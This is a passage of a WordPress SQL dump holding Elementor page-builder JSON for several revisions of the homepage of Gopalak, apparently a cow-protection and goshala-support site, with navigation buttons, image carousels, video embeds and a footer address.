mother\\\"<\\/p>\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2c59178\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"29d5b45\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1340,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\"},{\"id\":1354,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\"},{\"id\":1339,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/cows-farming-on-green-meadow-260nw-1704884002-e1663753177624.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"}],\"autoplay_speed\":1000},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\"},\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ba24d1d\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"background_background\":\"slideshow\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/values.png\",\"id\":1654,\"alt\":\"\",\"source\":\"library\"},\"background_slideshow_gallery\":[{\"id\":1577,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK55.png\"},{\"id\":1544,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/gopalak-B1-copy.jpg\"}],\"padding\":{\"unit\":\"px\",\"top\":\"150\",\"right\":\"0\",\"bottom\":\"0150\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5007eb7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"c7f7d6b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"_margin\":{\"unit\":\"px\",\"top\":\"-10\",\"right\":\"0\",\"bottom\":\"-10\",\"left\":\"-10\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" #800 Spandana towers\\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: namaste@gopalak.in\\n\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(11675,1936,'_elementor_page_assets','a:0:{}'),(11677,1937,'_elementor_edit_mode','builder'),(11678,1937,'_elementor_template_type','wp-page'),(11679,1937,'_elementor_version','3.7.8'),(11680,1937,'_wp_page_template','elementor_canvas'),(11681,1937,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"70\",\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/cropped-GOPALAK-COIN-2.0.png\",\"id\":1906,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\",\"image_custom_dimension\":{\"width\":\"56\",\"height\":\"67\"},\"link_to\":\"custom\",\"width\":{\"unit\":\"%\",\"size\":87,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":99,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"f29b88a\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"049c5ad\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"button_text_color\":\"#111111\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"db735bc\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"27f86d0\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"4613375\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"36373ca\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/aboutus\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#FFCC2A\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"button_text_color\":\"#000000\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"574c840\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"structure\":\"20\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Frame.png\",\"id\":1693,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-3\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"84647ad\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[{\"id\":\"4e75547\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1690,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-mark-stebnicki-2602864-scaled.jpg\"},{\"id\":1689,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-kat-smith-735976-scaled.jpg\"},{\"id\":1691,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-mark-stebnicki-2252557-scaled.jpg\"},{\"id\":1741,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-min-an-1455455-scaled.jpg\"},{\"id\":1742,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-roman-odintsov-8747798-scaled.jpg\"},{\"id\":1687,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-kelly-2881385-scaled.jpg\"}],\"thumbnail_size\":\"full\",\"slides_to_show\":\"1\",\"navigation\":\"none\",\"autoplay_speed\":1000,\"_margin\":{\"unit\":\"px\",\"top\":\"-10\",\"right\":\"12\",\"bottom\":\"-21\",\"left\":\"-12\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false},{\"id\":\"0468eb3\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\"},\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73700aa\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":975,\"sizes\":[]},\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\"},\"elements\":[{\"id\":\"f55311d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"background_background\":\"classic\"},\"elements\":[{\"id\":\"8ea7d73\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/depositphotos_12743475-stock-photo-farm-cattle.webp\",\"id\":1567,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"Adopt\\/Donate\",\"description_text\":\"You can donate any amount of your choice which will be used for fodder to feed cows.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D5EBC1\",\"css_filters_css_filter\":\"custom\",\"title_color\":\"#43693F\",\"title_typography_typography\":\"custom\",\"title_typography_font_family\":\"Itim\",\"title_typography_font_weight\":\"600\",\"description_color\":\"#43693F\",\"description_typography_typography\":\"custom\",\"description_typography_font_family\":\"Itim\",\"description_typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"d6c2143\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#43693F\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5bb322c\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"9ea7478\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\",\"id\":1340,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"Shop With Us\",\"description_text\":\"\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D5EBC1\",\"thumbnail_custom_dimension\":{\"width\":\"600\",\"height\":\"400\"},\"title_color\":\"#43693F\",\"title_typography_typography\":\"custom\",\"title_typography_font_family\":\"Itim\",\"title_typography_font_weight\":\"600\",\"description_color\":\"#43693F\",\"description_typography_typography\":\"custom\",\"description_typography_font_family\":\"Itim\",\"description_typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"cc6e4e9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#43693F\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7107c53\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#B87100\",\"background_color_b\":\"#B87100\",\"background_color_b_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]}},\"elements\":[{\"id\":\"c67e6d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e70fe37\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"11aef9e\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":904,\"sizes\":[]},\"structure\":\"22\",\"background_background\":\"classic\",\"background_color\":\"#B87100\",\"background_color_b\":\"#FFCC2A\"},\"elements\":[{\"id\":\"2d9f268\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"86a6968\",\"elType\":\"widget\",\"settings\":{\"title\":\"About Gopalak\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aa78264\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br \\/>Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being<\\/p>\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"400\",\"text_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"67983f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8e299f1\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#43693F\",\"_margin\":{\"unit\":\"px\",\"top\":\"49\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/aboutus\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"23d3073\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#B87100\",\"background_color_stop\":{\"unit\":\"%\",\"size\":86,\"sizes\":[]},\"background_color_b\":\"#B87100\"},\"elements\":[{\"id\":\"7d36be0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e43f473\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":71,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1c1c876\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\",\"background_color_b\":\"#FFCC2A\"},\"elements\":[{\"id\":\"4b90a4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"dee4139\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=0wll4Km5AU8\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"97c7ffb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f586793\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=bEyCT3KsAMQ\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"2f0ac23\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ec43a70\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=sVQg0-3WSc4\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca8c599\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\"},\"elements\":[{\"id\":\"f8ca017\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"da25a76\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"216af8d\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\",\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\"},\"elements\":[{\"id\":\"882c92e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"772bd0e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gallery\",\"title_color\":\"#43693F\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fbf7c50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"<\\/p>\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2c59178\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"29d5b45\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1340,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\"},{\"id\":1354,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\"},{\"id\":1339,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/cows-farming-on-green-meadow-260nw-1704884002-e1663753177624.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"}],\"autoplay_speed\":1000},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\"},\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ba24d1d\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"background_background\":\"slideshow\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/values.png\",\"id\":1654,\"alt\":\"\",\"source\":\"library\"},\"background_slideshow_gallery\":[{\"id\":1577,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK55.png\"},{\"id\":1544,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/gopalak-B1-copy.jpg\"}],\"padding\":{\"unit\":\"px\",\"top\":\"150\",\"right\":\"0\",\"bottom\":\"0150\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5007eb7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"c7f7d6b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"_margin\":{\"unit\":\"px\",\"top\":\"-10\",\"right\":\"0\",\"bottom\":\"-10\",\"left\":\"-10\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" #800 Spandana towers\\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: namaste@gopalak.in\\n\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(11682,1937,'_elementor_page_assets','a:0:{}'),(11684,1938,'_elementor_edit_mode','builder'),(11685,1938,'_elementor_template_type','wp-page'),(11686,1938,'_elementor_version','3.7.8'),(11687,1938,'_wp_page_template','elementor_canvas'),(11688,1938,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"70\",\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/cropped-GOPALAK-COIN-2.0.png\",\"id\":1906,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\",\"image_custom_dimension\":{\"width\":\"56\",\"height\":\"67\"},\"link_to\":\"custom\",\"width\":{\"unit\":\"%\",\"size\":87,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":99,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"f29b88a\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"049c5ad\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"button_text_color\":\"#111111\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":